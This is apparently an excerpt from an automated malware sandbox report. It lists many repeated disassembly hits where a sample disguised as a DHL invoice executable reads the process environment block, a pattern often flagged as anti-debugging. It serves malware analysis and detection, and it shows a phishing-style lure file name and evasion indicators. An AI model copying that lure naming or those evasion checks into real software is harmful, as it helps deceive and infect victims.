          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_015249A4 mov eax, dword ptr fs:[00000030h]3_2_015249A4
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01480050 mov eax, dword ptr fs:[00000030h]3_2_01480050
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01480050 mov eax, dword ptr fs:[00000030h]3_2_01480050
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01522073 mov eax, dword ptr fs:[00000030h]3_2_01522073
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01531074 mov eax, dword ptr fs:[00000030h]3_2_01531074
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01534015 mov eax, dword ptr fs:[00000030h]3_2_01534015
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01534015 mov eax, dword ptr fs:[00000030h]3_2_01534015
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014E7016 mov eax, dword ptr fs:[00000030h]3_2_014E7016
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014E7016 mov eax, dword ptr fs:[00000030h]3_2_014E7016
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014E7016 mov eax, dword ptr fs:[00000030h]3_2_014E7016
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0149002D mov eax, dword ptr fs:[00000030h]3_2_0149002D
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0149002D mov eax, dword ptr fs:[00000030h]3_2_0149002D
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0149002D mov eax, dword ptr fs:[00000030h]3_2_0149002D
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0149002D mov eax, dword ptr fs:[00000030h]3_2_0149002D
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0149002D mov eax, dword ptr fs:[00000030h]3_2_0149002D
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0147B02A mov eax, dword ptr fs:[00000030h]3_2_0147B02A
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0147B02A mov eax, dword ptr fs:[00000030h]3_2_0147B02A
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0147B02A mov eax, dword ptr fs:[00000030h]3_2_0147B02A
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0147B02A mov eax, dword ptr fs:[00000030h]3_2_0147B02A
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014FB8D0 mov eax, dword ptr fs:[00000030h]3_2_014FB8D0
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014FB8D0 mov ecx, dword ptr fs:[00000030h]3_2_014FB8D0
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014FB8D0 mov eax, dword ptr fs:[00000030h]3_2_014FB8D0
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014FB8D0 mov eax, dword ptr fs:[00000030h]3_2_014FB8D0
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014FB8D0 mov eax, dword ptr fs:[00000030h]3_2_014FB8D0
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014FB8D0 mov eax, dword ptr fs:[00000030h]3_2_014FB8D0
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014640E1 mov eax, dword ptr fs:[00000030h]3_2_014640E1
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014640E1 mov eax, dword ptr fs:[00000030h]3_2_014640E1
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014640E1 mov eax, dword ptr fs:[00000030h]3_2_014640E1
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014658EC mov eax, dword ptr fs:[00000030h]3_2_014658EC
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01469080 mov eax, dword ptr fs:[00000030h]3_2_01469080
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014E3884 mov eax, dword ptr fs:[00000030h]3_2_014E3884
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014E3884 mov eax, dword ptr fs:[00000030h]3_2_014E3884
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014A90AF mov eax, dword ptr fs:[00000030h]3_2_014A90AF
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014920A0 mov eax, dword ptr fs:[00000030h]3_2_014920A0
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014920A0 mov eax, dword ptr fs:[00000030h]3_2_014920A0
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014920A0 mov eax, dword ptr fs:[00000030h]3_2_014920A0
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014920A0 mov eax, dword ptr fs:[00000030h]3_2_014920A0
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014920A0 mov eax, dword ptr fs:[00000030h]3_2_014920A0
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014920A0 mov eax, dword ptr fs:[00000030h]3_2_014920A0
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0149F0BF mov ecx, dword ptr fs:[00000030h]3_2_0149F0BF
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0149F0BF mov eax, dword ptr fs:[00000030h]3_2_0149F0BF
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0149F0BF mov eax, dword ptr fs:[00000030h]3_2_0149F0BF
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0146DB40 mov eax, dword ptr fs:[00000030h]3_2_0146DB40
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01538B58 mov eax, dword ptr fs:[00000030h]3_2_01538B58
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0146F358 mov eax, dword ptr fs:[00000030h]3_2_0146F358
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0146DB60 mov ecx, dword ptr fs:[00000030h]3_2_0146DB60
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01493B7A mov eax, dword ptr fs:[00000030h]3_2_01493B7A
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01493B7A mov eax, dword ptr fs:[00000030h]3_2_01493B7A
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0152131B mov eax, dword ptr fs:[00000030h]3_2_0152131B
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014E53CA mov eax, dword ptr fs:[00000030h]3_2_014E53CA
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014E53CA mov eax, dword ptr fs:[00000030h]3_2_014E53CA
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0148DBE9 mov eax, dword ptr fs:[00000030h]3_2_0148DBE9
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014903E2 mov eax, dword ptr fs:[00000030h]3_2_014903E2
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014903E2 mov eax, dword ptr fs:[00000030h]3_2_014903E2
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014903E2 mov eax, dword ptr fs:[00000030h]3_2_014903E2
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014903E2 mov eax, dword ptr fs:[00000030h]3_2_014903E2
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014903E2 mov eax, dword ptr fs:[00000030h]3_2_014903E2
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014903E2 mov eax, dword ptr fs:[00000030h]3_2_014903E2
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01471B8F mov eax, dword ptr fs:[00000030h]3_2_01471B8F
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01471B8F mov eax, dword ptr fs:[00000030h]3_2_01471B8F
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0151D380 mov ecx, dword ptr fs:[00000030h]3_2_0151D380
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0152138A mov eax, dword ptr fs:[00000030h]3_2_0152138A
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0149B390 mov eax, dword ptr fs:[00000030h]3_2_0149B390
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01492397 mov eax, dword ptr fs:[00000030h]3_2_01492397
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01494BAD mov eax, dword ptr fs:[00000030h]3_2_01494BAD
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01494BAD mov eax, dword ptr fs:[00000030h]3_2_01494BAD
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01494BAD mov eax, dword ptr fs:[00000030h]3_2_01494BAD
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01535BA5 mov eax, dword ptr fs:[00000030h]3_2_01535BA5
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01469240 mov eax, dword ptr fs:[00000030h]3_2_01469240
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01469240 mov eax, dword ptr fs:[00000030h]3_2_01469240
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01469240 mov eax, dword ptr fs:[00000030h]3_2_01469240
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01469240 mov eax, dword ptr fs:[00000030h]3_2_01469240
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0152EA55 mov eax, dword ptr fs:[00000030h]3_2_0152EA55
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014F4257 mov eax, dword ptr fs:[00000030h]3_2_014F4257
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014A927A mov eax, dword ptr fs:[00000030h]3_2_014A927A
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0151B260 mov eax, dword ptr fs:[00000030h]3_2_0151B260
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0151B260 mov eax, dword ptr fs:[00000030h]3_2_0151B260
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01538A62 mov eax, dword ptr fs:[00000030h]3_2_01538A62
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0152AA16 mov eax, dword ptr fs:[00000030h]3_2_0152AA16
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0152AA16 mov eax, dword ptr fs:[00000030h]3_2_0152AA16
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01478A0A mov eax, dword ptr fs:[00000030h]3_2_01478A0A
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0146AA16 mov eax, dword ptr fs:[00000030h]3_2_0146AA16
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0146AA16 mov eax, dword ptr fs:[00000030h]3_2_0146AA16
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01483A1C mov eax, dword ptr fs:[00000030h]3_2_01483A1C
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01465210 mov eax, dword ptr fs:[00000030h]3_2_01465210
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01465210 mov ecx, dword ptr fs:[00000030h]3_2_01465210
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01465210 mov eax, dword ptr fs:[00000030h]3_2_01465210
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01465210 mov eax, dword ptr fs:[00000030h]3_2_01465210
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014A4A2C mov eax, dword ptr fs:[00000030h]3_2_014A4A2C
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014A4A2C mov eax, dword ptr fs:[00000030h]3_2_014A4A2C
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01492ACB mov eax, dword ptr fs:[00000030h]3_2_01492ACB
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01492AE4 mov eax, dword ptr fs:[00000030h]3_2_01492AE4
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0149D294 mov eax, dword ptr fs:[00000030h]3_2_0149D294
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0149D294 mov eax, dword ptr fs:[00000030h]3_2_0149D294
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014652A5 mov eax, dword ptr fs:[00000030h]3_2_014652A5
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014652A5 mov eax, dword ptr fs:[00000030h]3_2_014652A5
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014652A5 mov eax, dword ptr fs:[00000030h]3_2_014652A5
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014652A5 mov eax, dword ptr fs:[00000030h]3_2_014652A5
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014652A5 mov eax, dword ptr fs:[00000030h]3_2_014652A5
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0147AAB0 mov eax, dword ptr fs:[00000030h]3_2_0147AAB0
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0147AAB0 mov eax, dword ptr fs:[00000030h]3_2_0147AAB0
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0149FAB0 mov eax, dword ptr fs:[00000030h]3_2_0149FAB0
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014A3D43 mov eax, dword ptr fs:[00000030h]3_2_014A3D43
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014E3540 mov eax, dword ptr fs:[00000030h]3_2_014E3540
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01513D40 mov eax, dword ptr fs:[00000030h]3_2_01513D40
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01487D50 mov eax, dword ptr fs:[00000030h]3_2_01487D50
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0148C577 mov eax, dword ptr fs:[00000030h]3_2_0148C577
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0148C577 mov eax, dword ptr fs:[00000030h]3_2_0148C577
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01538D34 mov eax, dword ptr fs:[00000030h]3_2_01538D34
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0152E539 mov eax, dword ptr fs:[00000030h]3_2_0152E539
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01494D3B mov eax, dword ptr fs:[00000030h]3_2_01494D3B
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01494D3B mov eax, dword ptr fs:[00000030h]3_2_01494D3B
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01494D3B mov eax, dword ptr fs:[00000030h]3_2_01494D3B
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01473D34 mov eax, dword ptr fs:[00000030h]3_2_01473D34
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01473D34 mov eax, dword ptr fs:[00000030h]3_2_01473D34
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01473D34 mov eax, dword ptr fs:[00000030h]3_2_01473D34
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01473D34 mov eax, dword ptr fs:[00000030h]3_2_01473D34
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01473D34 mov eax, dword ptr fs:[00000030h]3_2_01473D34
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01473D34 mov eax, dword ptr fs:[00000030h]3_2_01473D34
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01473D34 mov eax, dword ptr fs:[00000030h]3_2_01473D34
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01473D34 mov eax, dword ptr fs:[00000030h]3_2_01473D34
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01473D34 mov eax, dword ptr fs:[00000030h]3_2_01473D34
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01473D34 mov eax, dword ptr fs:[00000030h]3_2_01473D34
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01473D34 mov eax, dword ptr fs:[00000030h]3_2_01473D34
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01473D34 mov eax, dword ptr fs:[00000030h]3_2_01473D34
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01473D34 mov eax, dword ptr fs:[00000030h]3_2_01473D34
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0146AD30 mov eax, dword ptr fs:[00000030h]3_2_0146AD30
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014EA537 mov eax, dword ptr fs:[00000030h]3_2_014EA537
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014E6DC9 mov eax, dword ptr fs:[00000030h]3_2_014E6DC9
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014E6DC9 mov eax, dword ptr fs:[00000030h]3_2_014E6DC9
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014E6DC9 mov eax, dword ptr fs:[00000030h]3_2_014E6DC9
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014E6DC9 mov ecx, dword ptr fs:[00000030h]3_2_014E6DC9
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014E6DC9 mov eax, dword ptr fs:[00000030h]3_2_014E6DC9
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014E6DC9 mov eax, dword ptr fs:[00000030h]3_2_014E6DC9
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01518DF1 mov eax, dword ptr fs:[00000030h]3_2_01518DF1
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0147D5E0 mov eax, dword ptr fs:[00000030h]3_2_0147D5E0
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0147D5E0 mov eax, dword ptr fs:[00000030h]3_2_0147D5E0
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0152FDE2 mov eax, dword ptr fs:[00000030h]3_2_0152FDE2
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0152FDE2 mov eax, dword ptr fs:[00000030h]3_2_0152FDE2
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0152FDE2 mov eax, dword ptr fs:[00000030h]3_2_0152FDE2
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0152FDE2 mov eax, dword ptr fs:[00000030h]3_2_0152FDE2
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01492581 mov eax, dword ptr fs:[00000030h]3_2_01492581
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01492581 mov eax, dword ptr fs:[00000030h]3_2_01492581
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01492581 mov eax, dword ptr fs:[00000030h]3_2_01492581
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01492581 mov eax, dword ptr fs:[00000030h]3_2_01492581
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01462D8A mov eax, dword ptr fs:[00000030h]3_2_01462D8A
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01462D8A mov eax, dword ptr fs:[00000030h]3_2_01462D8A
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01462D8A mov eax, dword ptr fs:[00000030h]3_2_01462D8A
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01462D8A mov eax, dword ptr fs:[00000030h]3_2_01462D8A
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01462D8A mov eax, dword ptr fs:[00000030h]3_2_01462D8A
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0149FD9B mov eax, dword ptr fs:[00000030h]3_2_0149FD9B
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0149FD9B mov eax, dword ptr fs:[00000030h]3_2_0149FD9B
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014935A1 mov eax, dword ptr fs:[00000030h]3_2_014935A1
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01491DB5 mov eax, dword ptr fs:[00000030h]3_2_01491DB5
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01491DB5 mov eax, dword ptr fs:[00000030h]3_2_01491DB5
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01491DB5 mov eax, dword ptr fs:[00000030h]3_2_01491DB5
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_015305AC mov eax, dword ptr fs:[00000030h]3_2_015305AC
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_015305AC mov eax, dword ptr fs:[00000030h]3_2_015305AC
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0149A44B mov eax, dword ptr fs:[00000030h]3_2_0149A44B
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014FC450 mov eax, dword ptr fs:[00000030h]3_2_014FC450
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014FC450 mov eax, dword ptr fs:[00000030h]3_2_014FC450
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0148746D mov eax, dword ptr fs:[00000030h]3_2_0148746D
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014E6C0A mov eax, dword ptr fs:[00000030h]3_2_014E6C0A
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014E6C0A mov eax, dword ptr fs:[00000030h]3_2_014E6C0A
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014E6C0A mov eax, dword ptr fs:[00000030h]3_2_014E6C0A
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014E6C0A mov eax, dword ptr fs:[00000030h]3_2_014E6C0A
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01521C06 mov eax, dword ptr fs:[00000030h]3_2_01521C06
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01521C06 mov eax, dword ptr fs:[00000030h]3_2_01521C06
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01521C06 mov eax, dword ptr fs:[00000030h]3_2_01521C06
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01521C06 mov eax, dword ptr fs:[00000030h]3_2_01521C06
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01521C06 mov eax, dword ptr fs:[00000030h]3_2_01521C06
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01521C06 mov eax, dword ptr fs:[00000030h]3_2_01521C06
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01521C06 mov eax, dword ptr fs:[00000030h]3_2_01521C06
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01521C06 mov eax, dword ptr fs:[00000030h]3_2_01521C06
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01521C06 mov eax, dword ptr fs:[00000030h]3_2_01521C06
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01521C06 mov eax, dword ptr fs:[00000030h]3_2_01521C06
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01521C06 mov eax, dword ptr fs:[00000030h]3_2_01521C06
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01521C06 mov eax, dword ptr fs:[00000030h]3_2_01521C06
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01521C06 mov eax, dword ptr fs:[00000030h]3_2_01521C06
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01521C06 mov eax, dword ptr fs:[00000030h]3_2_01521C06
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0153740D mov eax, dword ptr fs:[00000030h]3_2_0153740D
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0153740D mov eax, dword ptr fs:[00000030h]3_2_0153740D
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0153740D mov eax, dword ptr fs:[00000030h]3_2_0153740D
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0149BC2C mov eax, dword ptr fs:[00000030h]3_2_0149BC2C
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01538CD6 mov eax, dword ptr fs:[00000030h]3_2_01538CD6
